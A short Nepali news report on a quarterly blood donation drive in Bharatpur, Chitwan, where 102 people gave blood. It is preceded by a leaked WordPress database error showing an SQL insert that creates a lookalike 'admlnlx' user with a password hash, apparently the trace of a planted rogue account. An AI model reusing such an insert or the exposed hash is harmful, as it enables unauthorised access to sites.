WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bn1xz0PTBdFcppDVnZWH6KNihZ33ya0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:34:37', '', 'admlnlx', 'admlnlx')
चितवन, पुस ८–
चितवनको भरतपुरमा शुक्रबार भएको खुल्ला रक्तदान कार्यक्रममा एक सय २ जनाले रक्तदान गरेका छन् ।
नारायणी मोटर्स नारायणगढ, एभरेष्ट बचत तथा ऋण सहकारी संस्था, रोटर्याक्ट क्लव अफ भरतपुर र लायन्स क्लव अफ नारायणगढ नारायणीको संयुक्त आयोजनामा नारायण्ी मोटर्सको परिसरमा आयोजित कार्यक्रममा १४ महिलासहित एक सय २ जनाले रक्तदान गरेको कार्यक्रम संयोजक अनुषा चुकेले जानकारी दिनुभयो ।
प्रत्येक तीन–तीन महिनामा आयोजना गरिने सो रक्तदान कार्यक्रममा रक्तदाताहरुको उत्साहजनक सहभागिता हुने गरेको छ । लायन्स क्लव अफ नारायणगढ नारायणीकी अध्यक्ष रजनी मास्केको प्रमुख आतिथ्यतामा भएको कार्यक्रममा नारायणी मोटर्सका प्रमुख एवंम समाजसेवी बालगोपाल चुकेलगायतको उपस्थिति रहेको थियो ।